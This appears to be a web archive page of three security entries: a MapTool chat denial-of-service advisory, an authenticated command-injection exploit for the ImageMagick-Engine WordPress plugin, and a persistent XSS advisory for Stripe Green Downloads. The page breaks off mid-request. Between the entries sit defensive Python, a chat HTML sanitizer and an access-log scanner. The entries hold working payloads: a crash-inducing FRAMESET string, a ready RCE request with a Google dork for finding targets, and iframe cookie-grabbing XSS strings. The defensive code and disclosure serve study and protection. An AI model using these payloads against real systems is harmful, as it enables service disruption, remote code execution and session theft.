<pre><code>Document Title:<br />===============<br />MapTool v1.11.5 - Denial of Service Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2318<br /><br /><br />Release Date:<br />=============<br />2022-10-10<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2318<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.7<br /><br /><br />Vulnerability Class:<br />====================<br />Denial of Service<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />MapTool is a fully featured, flexible virtual tabletop. Not only does MapTool come with powerful tools for creating detailed maps<br />but also a chat function, an initiative tracker, and a detailed token management system to create characters, monsters, objects,<br />and anything you can imagine. MapTool's user interface is highly configurable, and features not being used can be hidden out of sight.<br />The latest version of MapTool can be found on GitHub. MapTool attempts to use Semantic Versioning to help groups know whether a change<br />may break their game or not so they can decide when to upgrade. Exciting new features can be tested in development (alpha or beta) builds,<br />but for your game where stability matters sticking to the major releases is recommended. 
MapTool campaigns saved in newer versions may not<br />work on older versions, so be careful with your campaign files when trying out development builds.<br /><br />(Copy of the Homepage: https://wiki.rptools.info/index.php/MapTool )<br />(Download Software: https://www.rptools.net/toolbox/download-rptools-products )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a remote denial of service vulnerability in the official MapTool v1.11.5 software.<br /><br />Affected Product(s):<br />====================<br />Rptools<br />Product: MapTool v1.11.5 - (Windows) (Linux) (MacOS)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-06-03: Researcher Notification & Coordination (Security Researcher)<br />2022-06-04: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2022-10-10: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Guest Privileges)<br /><br /><br />User Interaction:<br />=================<br />No User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />The remote denial of service vulnerability is located in the chat function of the official MapTool v1.11.5 software.<br />Attackers with chat access can transmit a specially crafted HTML payload that, when the Swing chat view lays it out, triggers an unhandled<br />java.lang.ArrayIndexOutOfBoundsException in javax.swing.text.html.BlockView.layoutMinorAxis and a java.lang.NullPointerException on the<br />javax.swing.text.html.StyleSheet$BoxPainter used by javax.swing.text.html.TableView.updateInsets (see the debug session logs below).<br />Attackers are able to inject payloads that crash the application immediately and permanently: the compromised chat and project can be<br />saved as a cmpgn file, and that file then crashes the application on every import with the same unhandled exceptions.<br /><br />Vulnerable Module(s):<br />[+] Chat (Werkzeuge / Tools)<br /><br />Vulnerable Function(s):<br />[+] javax.swing.text.html.StyleSheet$BoxPainter<br />[+] javax.swing.text.html.BlockView.layoutMinorAxis<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The remote denial of service vulnerability can be exploited by remote attackers with chat access without user interaction, or by local users.<br />For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.<br /><br />Manual steps to reproduce the vulnerability locally:<br />1. Install the newest MapTool version<br />2. Start the tool and host your own session<br />3. Open the message chat box<br />4. Enter the payload and press the send button<br />5. The software crashes locally with the unhandled exception<br />Note: Open the client again and save the chat together with the campaign as a cmpgn file<br />6. Importing that cmpgn file locally now crashes the host with the same exception<br /><br />Manual steps to reproduce the vulnerability remotely:<br />1. Install the newest MapTool version<br />2. Start the tool and join an existing party<br />3. Open the chat<br />4. Inject the payload via a local js or base64 encoded link and submit it<br />5. 
The host receives the chat message; as soon as the host clicks the link, the host session crashes with the unhandled null pointer exception<br /><br />Payload:<br /><FRAMESET></FRAMESET><br /><br />PoC:<br />testfile.cmpgn<br /><br />--- Debug Session Logs ---<br />java.lang.ArrayIndexOutOfBoundsException: Index 1 out of bounds for length 1<br />at java.desktop/javax.swing.text.html.BlockView.layoutMinorAxis(Unknown Source)<br />at java.desktop/javax.swing.text.html.HTMLEditorKit$HTMLFactory$BodyBlockView.layoutMinorAxis(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.setSpanOnAxis(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.layout(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.setSize(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.updateChildSizes(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.setSpanOnAxis(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.layout(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.setSize(Unknown Source)<br />at java.desktop/javax.swing.plaf.basic.BasicTextUI$RootView.setSize(Unknown Source)<br />at java.desktop/javax.swing.plaf.basic.BasicTextUI.getPreferredSize(Unknown Source)<br />at java.desktop/javax.swing.JComponent.getPreferredSize(Unknown Source)<br />at java.desktop/javax.swing.JEditorPane.getPreferredSize(Unknown Source)<br />at java.desktop/javax.swing.ScrollPaneLayout.layoutContainer(Unknown Source)<br />at java.desktop/java.awt.Container.layout(Unknown Source)<br />at java.desktop/java.awt.Container.doLayout(Unknown Source)<br />at java.desktop/java.awt.Container.validateTree(Unknown Source)<br />at java.desktop/java.awt.Container.validate(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager$3.run(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager$3.run(Unknown Source)<br />at java.base/java.security.AccessController.doPrivileged(Unknown Source)<br />at 
java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager.validateInvalidComponents(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager$ProcessingRunnable.run(Unknown Source)<br />at java.desktop/java.awt.event.InvocationEvent.dispatch(Unknown Source)<br />at java.desktop/java.awt.EventQueue.dispatchEventImpl(Unknown Source)<br />at java.desktop/java.awt.EventQueue$4.run(Unknown Source)<br />at java.desktop/java.awt.EventQueue$4.run(Unknown Source)<br />at java.base/java.security.AccessController.doPrivileged(Unknown Source)<br />at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Unknown Source)<br />at java.desktop/java.awt.EventQueue.dispatchEvent(Unknown Source)<br />at net.rptools.maptool.client.swing.MapToolEventQueue.dispatchEvent(MapToolEventQueue.java:54)<br />at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source)<br />at java.desktop/java.awt.WaitDispatchSupport$2.run(Unknown Source)<br />at java.desktop/java.awt.WaitDispatchSupport$4.run(Unknown Source)<br />at java.desktop/java.awt.WaitDispatchSupport$4.run(Unknown Source)<br />at java.base/java.security.AccessController.doPrivileged(Unknown Source)<br />at java.desktop/java.awt.WaitDispatchSupport.enter(Unknown Source)<br />at java.desktop/java.awt.Dialog.show(Unknown Source)<br />at java.desktop/java.awt.Component.show(Unknown Source)<br />at java.desktop/java.awt.Component.setVisible(Unknown Source)<br />at java.desktop/java.awt.Window.setVisible(Unknown Source)<br />at java.desktop/java.awt.Dialog.setVisible(Unknown Source)<br />at net.rptools.maptool.client.swing.MapToolEventQueue.displayPopup(MapToolEventQueue.java:109)<br />at 
net.rptools.maptool.client.swing.MapToolEventQueue.dispatchEvent(MapToolEventQueue.java:73)<br />at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEvents(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEvents(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.run(Unknown Source)<br />-<br />java.lang.NullPointerException: Cannot invoke "javax.swing.text.html.StyleSheet$BoxPainter.getInset(int, javax.swing.text.View)" because "this.painter" is null<br />at java.desktop/javax.swing.text.html.TableView.updateInsets(Unknown Source)<br />at java.desktop/javax.swing.text.html.TableView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.checkRequests(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.getMinimumSpan(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.html.BlockView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.checkRequests(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.getMinimumSpan(Unknown Source)<br />at java.desktop/javax.swing.text.html.BlockView.getMinimumSpan(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.html.BlockView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.html.HTMLEditorKit$HTMLFactory$BodyBlockView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.checkRequests(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.getMinimumSpan(Unknown Source)<br 
/>at java.desktop/javax.swing.text.html.BlockView.getMinimumSpan(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.html.BlockView.calculateMajorAxisRequirements(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.checkRequests(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.setSpanOnAxis(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.layout(Unknown Source)<br />at java.desktop/javax.swing.text.BoxView.setSize(Unknown Source)<br />at java.desktop/javax.swing.plaf.basic.BasicTextUI$RootView.setSize(Unknown Source)<br />at java.desktop/javax.swing.plaf.basic.BasicTextUI.getPreferredSize(Unknown Source)<br />at java.desktop/javax.swing.JComponent.getPreferredSize(Unknown Source)<br />at java.desktop/javax.swing.JEditorPane.getPreferredSize(Unknown Source)<br />at java.desktop/javax.swing.ScrollPaneLayout.layoutContainer(Unknown Source)<br />at java.desktop/java.awt.Container.layout(Unknown Source)<br />at java.desktop/java.awt.Container.doLayout(Unknown Source)<br />at java.desktop/java.awt.Container.validateTree(Unknown Source)<br />at java.desktop/java.awt.Container.validate(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager$3.run(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager$3.run(Unknown Source)<br />at java.base/java.security.AccessController.doPrivileged(Unknown Source)<br />at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager.validateInvalidComponents(Unknown Source)<br />at java.desktop/javax.swing.RepaintManager$ProcessingRunnable.run(Unknown Source)<br />at java.desktop/java.awt.event.InvocationEvent.dispatch(Unknown Source)<br />at java.desktop/java.awt.EventQueue.dispatchEventImpl(Unknown Source)<br />at java.desktop/java.awt.EventQueue$4.run(Unknown Source)<br />at 
java.desktop/java.awt.EventQueue$4.run(Unknown Source)<br />at java.base/java.security.AccessController.doPrivileged(Unknown Source)<br />at java.base/java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Unknown Source)<br />at java.desktop/java.awt.EventQueue.dispatchEvent(Unknown Source)<br />at net.rptools.maptool.client.swing.MapToolEventQueue.dispatchEvent(MapToolEventQueue.java:54)<br />at java.desktop/java.awt.EventDispatchThread.pumpOneEventForFilters(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEventsForFilter(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEventsForHierarchy(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEvents(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.pumpEvents(Unknown Source)<br />at java.desktop/java.awt.EventDispatchThread.run(Unknown Source)<br /><br /><br />Security Risk:<br />==============<br />The security risk of the remote denial of service vulnerability in the maptool software is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. 
Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ; https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material, contact (admin@ or research@) to ask for permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
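Both stack traces in the advisory end in the Swing HTML layout code under JEditorPane.getPreferredSize, so the client-side mitigation is to never hand untrusted chat markup to that renderer unfiltered. The allowlist sanitizer below is an added example, not MapTool code: it assumes the chat pane renders messages with javax.swing's HTMLEditorKit (as the traces show) and that a small set of inline formatting tags is all chat needs. The tag and attribute allowlists, and the http/https-only link rule that also neutralizes the local or base64-encoded link used in the remote steps, are choices made for this illustration; the sample inputs at the bottom are constructed, apart from the advisory's own <FRAMESET></FRAMESET> payload.

```python
"""Allowlist sanitizer for chat markup destined for a Swing HTML view.

Added example (not MapTool code). Assumptions: the chat pane renders
messages with javax.swing.text.html.HTMLEditorKit, as the advisory's stack
traces show, and an allowlist of inline tags is enough for chat. Every tag
outside the allowlist (frameset, frame, iframe, script, table, ...) is
emitted as escaped text, so the renderer never builds a view for it.
"""
import html
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "u", "em", "strong", "br", "p", "span", "a", "font"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "font": {"color", "size"}, "span": {"style"}}
VOID_TAGS = {"br"}
SAFE_HREF_SCHEMES = ("http://", "https://")   # rejects javascript:, data:, file:


def _href_is_safe(value):
    # Drop control characters that some parsers ignore inside a scheme, then
    # require an explicit http(s) scheme; relative links are rejected as well.
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20).lower()
    return cleaned.startswith(SAFE_HREF_SCHEMES)


class ChatSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []        # sanitized output fragments
        self.dropped = []    # audit trail of what was neutralized
        self.stack = []      # currently open allowed elements

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            # Keep the sender's text visible, but as text rather than markup.
            self.out.append(html.escape(self.get_starttag_text()))
            return
        parts = [tag]
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not (value and _href_is_safe(value)):
                self.dropped.append(f"{tag}@href")
                continue
            parts.append(f'{name}="{html.escape(value or "", quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in self.stack:
            # Close in order so the output stays well-nested for the renderer.
            while self.stack:
                closed = self.stack.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break
        else:
            self.out.append(html.escape(f"</{tag}>"))

    def handle_data(self, data):
        self.out.append(html.escape(data))

    def result(self):
        while self.stack:                       # close anything left open
            self.out.append(f"</{self.stack.pop()}>")
        return "".join(self.out)


def sanitize_chat_html(raw):
    """Return (safe_markup, dropped) for one chat message."""
    parser = ChatSanitizer()
    parser.feed(raw)
    parser.close()
    return parser.result(), parser.dropped


if __name__ == "__main__":
    # The advisory's payload plus constructed samples of the link vector.
    for sample in ("<FRAMESET></FRAMESET>",
                   '<a href="data:text/html;base64,PGZyYW1lc2V0Pg==">click</a>',
                   '<b>ok</b> <a href="https://example.com/">link</a>'):
        print(sanitize_chat_html(sample))
```

Because the filter runs before the message reaches the Swing view, it protects the host as well as other clients, and the `dropped` list gives the server something to log when a guest keeps sending frameset or script tags. The same function applied to chat text loaded from a cmpgn file closes the "crashes on every import" path described in the advisory, since the stored payload is rewritten to inert text before layout.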
<pre><code># Exploit Title: WordPress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)<br /># Google Dork: inurl:"/wp-content/plugins/imagemagick-engine/"<br /># Date: Thursday, September 1, 2022<br /># Exploit Author: ABDO10<br /># Vendor Homepage: https://wordpress.org/plugins/imagemagick-engine/<br /># Software Link: https://github.com/orangelabweb/imagemagick-engine/<br /># Version: <= 1.7.4<br /># Tested on: Windows 10<br /><br />-- Vulnerable section:<br />https://github.com/orangelabweb/imagemagick-engine/commit/73c1d837e0a23870e99d5d1470bd328f8b2cbcd4#diff-83bcdfbbb7b8eaad54df4418757063ad8ce7f692f189fdce2f86b2fe0bcc0a4dR529<br /><br />-- Payload on Windows: d&calc.exe&anything<br />-- Payload on Unix: notify-send "done"<br />-- Exploit (the cli_path value must be URL-encoded so that its & characters are not treated as query separators; the request must carry an authenticated WordPress session cookie):<br /><br />GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=[payload] HTTP/1.1<br />Host: localhost<br />Cookie: wordpress_sec_xx=; wp-settings-time-1=; wordpress_test_cookie=; wordpress_logged_in_xx=somestuff<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://localhost/wp/wordpress/wp-admin/options-general.php?page=imagemagick-engine<br />X-Requested-With: XMLHttpRequest<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br /></code></pre>
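A defender who cannot patch immediately wants to know whether the `ime_test_im_path` action has already been abused. The sweep below is an added example, not part of the exploit entry or of the plugin: it assumes the web server writes combined-format access logs and that a legitimate `cli_path` is an absolute path to an ImageMagick `convert` or `magick` binary, so anything else is flagged, whether it carries shell metacharacters (the Windows `d&calc.exe&anything` payload) or is simply a different command (the Unix `notify-send "done"` payload, which has no metacharacter at all). The log lines are constructed for the illustration.

```python
"""Access-log sweep for the ImageMagick-Engine cli_path injection.

Added example, not the exploit author's or the plugin's code. Assumptions:
the web server writes combined-format access logs, and a legitimate
cli_path is an absolute path to an ImageMagick convert/magick binary.
The log lines below are constructed for this illustration.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Characters that let a value escape the intended command on sh or cmd.exe.
SHELL_META = re.compile(r"[;&|`$<>\n\r]")
# Absolute POSIX or Windows path ending in the ImageMagick binary (assumed policy).
LEGIT_CLI_PATH = re.compile(
    r"^(?:/[\w.\-]+)+/(?:convert|magick)$"
    r"|^[A-Za-z]:(?:\\[\w .()\-]+)+\\(?:convert|magick)\.exe$",
    re.IGNORECASE,
)

SAMPLE_LOG = [  # constructed, not captured traffic
    '203.0.113.7 - - [01/Sep/2022:10:02:11 +0000] "GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=/usr/bin/convert HTTP/1.1" 200 42 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Sep/2022:10:03:40 +0000] "GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=d%26calc.exe%26anything HTTP/1.1" 200 42 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Sep/2022:10:04:02 +0000] "GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=notify-send+%22done%22 HTTP/1.1" 200 42 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Sep/2022:10:05:00 +0000] "GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=C%3A%5CImageMagick%5Cconvert.exe HTTP/1.1" 200 42 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Sep/2022:10:05:30 +0000] "GET /wp/wordpress/wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]


def inspect_cli_path(value):
    """Return a reason string if the decoded cli_path looks injected, else None."""
    if SHELL_META.search(value):
        return "shell metacharacter in cli_path"
    if not LEGIT_CLI_PATH.match(value):
        return "cli_path is not an absolute path to convert/magick"
    return None


def scan_access_log(lines):
    """Return one finding per suspicious ime_test_im_path request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        # parse_qs percent-decodes once, matching what PHP hands the plugin.
        query = parse_qs(url.query, keep_blank_values=True)
        if query.get("action", [""])[0] != "ime_test_im_path":
            continue
        for value in query.get("cli_path", []):
            reason = inspect_cli_path(value)
            if reason:
                findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                                 "cli_path": value, "reason": reason,
                                 "status": m.group("status")})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} -> {f['cli_path']!r}: {f['reason']}")
```

Two caveats when running this for real: admin-ajax.php also accepts the same parameters in a POST body, which never reaches the access log, so a hit here is evidence but a miss is not clearance; and a 200 response from admin-ajax.php says nothing about whether the command ran, so correlate findings with process-creation telemetry on the web host (a child of the PHP worker named calc.exe or notify-send is the confirmation).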
<pre><code>Document Title:<br />===============<br />Stripe Green Downloads 2.03 - Cross Site Web Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2287<br /><br /><br />Release Date:<br />=============<br />2022-10-17<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2287<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.2<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Easily configure the plugin to accept payments through Stripe with Strong Customer Authentication. Easily style payment button<br />with overall styling settings. Tons of options for any needs. Host files in secured folder, Media Library (WordPress plugin only)<br />or anywhere on your server. Send custom email notifications to buyer and administrator after successful payments. 
Collect statistics<br />of button impressions, payments and downloads for any file for any period.<br /><br />(Copy of the Homepage: https://halfdata.com/green-downloads/stripe/ )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Stripe Green Downloads web-application and WordPress plugin.<br /><br /><br />Affected Product(s):<br />====================<br />halfdata<br />Product: Stripe Green Downloads - Admin Panel v1.0 (Web-Application)<br />Product: Stripe Green Downloads - WordPress Plugin 2.03 (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-10-17: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Moderator Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent input validation web vulnerability has been discovered in the Stripe Green Downloads web-application and WordPress plugin v2.03.<br />The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector and so compromise<br />browser-to-web-application requests from the application side.<br /><br />The persistent xss web vulnerability is located in the `Label`, `Processing label` and `Download label` input fields of the<br />`Green Downloads - Settings - Button` module. 
Attackers with privileged access to the panel are able to inject their own<br />malicious script code into the button labels; the injected code executes in the preview context. The request method to inject is POST<br />and the attack vector is persistent on the application-side. The vulnerable parameters are `idcore-button-label`,<br />`idcore-button-label-processing` and `idcore-button-label-download`.<br /><br />Successful exploitation of the vulnerability results in session hijacking, phishing attacks,<br />external redirects to malicious sources and manipulation of the affected application modules.<br /><br />Vulnerable Module(s):<br />[+] Green Downloads - Settings - Button<br /><br />Vulnerable Input(s):<br />[+] Label<br />[+] Processing label<br />[+] Download label<br /><br />Vulnerable Parameter(s):<br />[+] idcore-button-label<br />[+] idcore-button-label-processing<br />[+] idcore-button-label-download<br /><br />Affected Module(s):<br />[+] Preview (/stripe/script/?page=idcore-settings)<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent cross site scripting web vulnerability can be exploited by remote attackers with a privileged account and with low user interaction.<br />For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Vulnerable Source: /stripe/script/?page=idcore-settings<br /><tbody><tr><td colspan="2"><hr></td></tr><br /><tr><th>Preview:</th><td><br /><div id="idcore-preview-content" class="idcore-preview-container"><link href="//x/css?family=Strait:100,200,300,400,500,600,700,800,900&<br />subset=arabic,vietnamese,hebrew,thai,bengali,latin,latin-ext,cyrillic,cyrillic-ext,greek" rel="stylesheet"<br />type="text/css"><style>.idcore-preview-button{font-family:'Strait','arial';font-size:20px;color:#ffffff;font-weight:normal;font-style:normal;<br 
/>text-decoration:none;text-transform:uppercase;width:250px;height:56px;line-height:56px;background-color:#d4150b;<br />background-image:linear-gradient(to bottom,rgba(255,255,255,.05) 0,rgba(255,255,255,.05) 50%,rgba(0,0,0,.05) 51%,rgba(0,0,0,.05) 100%);<br />border-width:1px;border-style:solid;border-color:#d4150b;border-radius:3px;box-shadow: 2px 2px 0px 0px rgba(68, 68, 68, 0.2);}</style><br /><span id="idcore-preview-button" class="idcore-preview-button idcore-preview-button-shift-down" onclick="return idcore_switch_preview_button_state();"<br />data-label="Buy Now:>"<iframe src=evil.source onload=alert(document.cookie)> 5.00 USD"<br />data-label-processing="Processing...>"<iframe src=evil.source onload=alert(document.cookie)>"<br />data-label-download="Download Now!>"<iframe src=evil.source onload=alert(document.cookie)>"<br />data-state="3">Download Now!>"<iframe src="evil.source" onload="alert(document.cookie)"></iframe></span></div><br /></td></tr></tbody><br /><br /><br />--- PoC Session Logs (POST) ---<br />https://green-downloads.localhost:8080/green-downloads/demo/stripe/script/ajax.php<br />Host: green-downloads.localhost:8080<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 4829<br />Origin:https://green-downloads.localhost:8080<br />Connection: keep-alive<br />Referer:https://green-downloads.localhost:8080/green-downloads/demo/stripe/script/?page=idcore-settings<br />Cookie: uap-auth=njqYqYrjVyg7aWCO; __stripe_mid=2939b7be-7000-43b1-9940-d26f391ae745ab4b3a; __stripe_sid=0813d899-c76d-4b14-832d-d55565cd96dbdc938<br />Post: Admin Panel&idcore-button-label=Buy Now:>"<iframe src=evil.source onload=alert(document.cookie)> {price} {currency}<br />&idcore-button-label-processing=Processing...>"<iframe src=evil.source onload=alert(document.cookie)><br />&idcore-button-label-download=Download Now!>"<iframe src=evil.source 
onload=alert(document.cookie)>&idcore-button-size=fixed&idcore-button-width=250<br />&idcore-button-height=56&idcore-button-padding-top=16&idcore-button-padding-right=32&idcore-button-padding-bottom=16<br />&idcore-button-padding-left=32&idcore-responsiveness-size=480&idcore-responsiveness-custom=480&idcore-button-text-family=Strait<br />&idcore-button-text-size=20&idcore-button-text-transform=uppercase&idcore-button-text-color=#ffffff&idcore-button-background-image=<br />&idcore-button-background-size=auto&idcore-button-background-hposition=left&idcore-button-background-vposition=top<br />&idcore-button-background-repeat=repeat&idcore-button-background-color=#d4150b&idcore-button-background-gradient=2shades&idcore-button-background-color2=<br />&idcore-button-border-width=1&idcore-button-border-style=solid<br />&idcore-button-border-radius=3&idcore-button-border-left=on&idcore-button-border-top=on&idcore-button-border-bottom=on<br />&idcore-button-border-right=on&idcore-button-border-color=#d4150b&idcore-button-shadow-size=small&idcore-button-shadow-style=solid<br />&idcore-button-shadow-color=rgba(68, 68, 68, 0.2)&idcore-button-hover-inherit=on&idcore-button-hover-text-family=Strait&idcore-button-hover-text-size=20<br />&idcore-button-hover-text-transform=uppercase&idcore-button-hover-text-color=#ffffff&idcore-button-hover-background-image=<br />&idcore-button-hover-background-size=auto&idcore-button-hover-background-hposition=left&idcore-button-hover-background-vposition=top<br />&idcore-button-hover-background-repeat=repeat&idcore-button-hover-background-color=#d4150b&idcore-button-hover-background-gradient=2shades<br 